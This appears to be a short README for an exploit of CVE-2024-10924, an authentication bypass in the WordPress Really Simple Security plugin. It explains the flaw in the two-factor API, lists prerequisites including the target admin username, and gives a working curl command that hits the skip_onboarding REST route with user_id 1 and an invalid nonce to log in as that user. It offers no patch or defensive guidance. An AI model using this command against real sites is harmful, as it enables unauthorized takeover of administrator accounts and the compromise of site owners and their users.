
Exploit for CVE-2024-10924, a critical authentication bypass in WordPress Really Simple Security plugin (versions 9.0.0-9.1.1.1). Allows unauthenticated attackers to log in as any user via a flaw in the Two-Factor Authentication API.
CVE-2024-10924 is a critical authentication bypass vulnerability in the Really Simple Security plugin for WordPress (versions 9.0.0 to 9.1.1.1). This vulnerability allows unauthenticated attackers to log in as any user (including admin) by exploiting a flaw in the Two-Factor Authentication (2FA) API.
A WordPress site running a vulnerable version of the Really Simple Security plugin. Python 3.x or cURL installed for testing. The target WordPress admin username (user enumeration may be required).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v